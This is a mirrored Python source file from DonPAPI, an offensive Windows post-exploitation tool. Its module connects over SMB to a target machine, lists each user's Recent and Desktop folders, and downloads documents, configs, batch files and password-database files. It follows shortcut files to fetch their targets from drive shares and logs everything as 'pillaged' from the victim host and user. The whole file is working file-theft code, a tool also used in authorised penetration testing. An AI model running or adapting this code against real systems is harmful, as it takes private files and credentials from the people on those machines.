RepoMirrors
/
DonPAPI
mirror of https://github.com/login-securite/DonPAPI
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
DonPAPI/lib/RecentFiles.py

95 lines
4.8 KiB
Python
Raw Permalink Blame History

import ntpath
import LnkParse3,os
from lib.toolbox import bcolors
from lib.fileops import MyFileOps
class recent_files():
def __init__(self,smb,myregops,myfileops,logger,options,db,users):
self.myregops = myregops
self.myfileops = myfileops
self.logging = logger
self.options = options
self.db = db
self.users = users
self.smb = smb
def run(self):
self.get_files()
#self.process_files()
def get_files(self):
self.logging.info(f"[{self.options.target_ip}] {bcolors.OKBLUE}[+] Gathering Recent Files and Desktop Files {bcolors.ENDC}")
blacklist = ['.', '..']
user_directories = [("Users\\{username}\\Recent", ('*.xls','*.pdf','*.doc*','*.txt','*.lnk','*.kbdx','*.xml','*.config','*.bat')),
("Users\\{username}\\Desktop", ('*.xls','*.pdf','*.doc*','*.txt','*.lnk','*.kbdx','*.xml','*.config','*.bat'))]
machine_directories = [("Windows\\System32\\Drivers\\etc", ('hosts','hosts'))]
for user in self.users:
self.logging.debug(
f"[{self.options.target_ip}] Looking for {user.username} ")
if user.username == 'MACHINE$':
directories_to_use = machine_directories
else:
directories_to_use = user_directories
for info in directories_to_use:
my_dir, my_mask = info
tmp_pwd = my_dir.format(username=user.username)
self.logging.debug(f"[{self.options.target_ip}] Looking for {user.username} files in {tmp_pwd} with mask {my_mask}")
for mask in my_mask:
my_directory = self.myfileops.do_ls(tmp_pwd, mask, display=False)
for infos in my_directory:
longname, is_directory = infos
self.logging.debug("ls returned file %s" % longname)
if longname not in blacklist and not is_directory:
try:
# Downloading file
localfile = self.myfileops.get_file(ntpath.join(tmp_pwd, longname), allow_access_error=True)
self.process_file(localfile,user.username)
except Exception as ex:
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception in DownloadFile {localfile}{bcolors.ENDC}")
self.logging.debug(ex)
def process_file(self,localfile,from_user):
if os.path.splitext(localfile)[-1] == '.lnk':
self.logging.debug(
f"[{self.options.target_ip}] {bcolors.WARNING} {localfile} is a lnk file {bcolors.ENDC}")
new_localfile=self.process_lnk(localfile)
if new_localfile != '':
if os.path.splitext(new_localfile)[-1] != '.lnk':
self.process_file(new_localfile,from_user)
return 1
return -1
#TODO
#Analyse du contenu =>
#energistrement des infos dans la DB
self.db.add_file(file_path=os.path.abspath(localfile), filename=os.path.split(localfile)[1],extension=os.path.splitext(localfile)[-1].replace('.',''),pillaged_from_computer_ip=self.options.target_ip,pillaged_from_username=from_user)
def process_lnk(self,localfile):
try:
with open(localfile, 'rb') as indata:
lnk = LnkParse3.lnk_file(indata)
#lnk.print_json()
#self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}LNK file {localfile} gives {lnk.get_json()['link_info']['local_base_path']} {bcolors.ENDC}")
#check drive letter
if 'local_base_path' in lnk.get_json()['link_info']:
drive_letter=lnk.get_json()['link_info']['local_base_path'][0]+'$'
new_fileops=MyFileOps(self.smb,self.logging,self.options)
new_fileops.do_use(drive_letter)
tmp_pwd = lnk.get_json()['link_info']['local_base_path'][len(f"{drive_letter}:\\")-1:]
self.logging.debug(f"[{self.options.target_ip}] {bcolors.OKBLUE}tmp_pwd is {drive_letter} : {tmp_pwd} for {localfile}{bcolors.ENDC}")
if os.path.splitext(tmp_pwd)[-1].replace('.','') != 'exe':#in ['xls','pdf','doc','docx','txt','bat','kbdx','xml','config']:
new_localfile = new_fileops.get_file(tmp_pwd, allow_access_error=True)
self.logging.debug(f"[{self.options.target_ip}] {bcolors.OKBLUE}downloaded {new_localfile} for {localfile}{bcolors.ENDC}")
return new_localfile
return ''
except Exception as ex:
self.logging.debug(
f"[{self.options.target_ip}] {bcolors.WARNING}Exception in ProcessF Lnk for {localfile}{bcolors.ENDC}")
self.logging.debug(ex)
Reference in New Issue View Git Blame Copy Permalink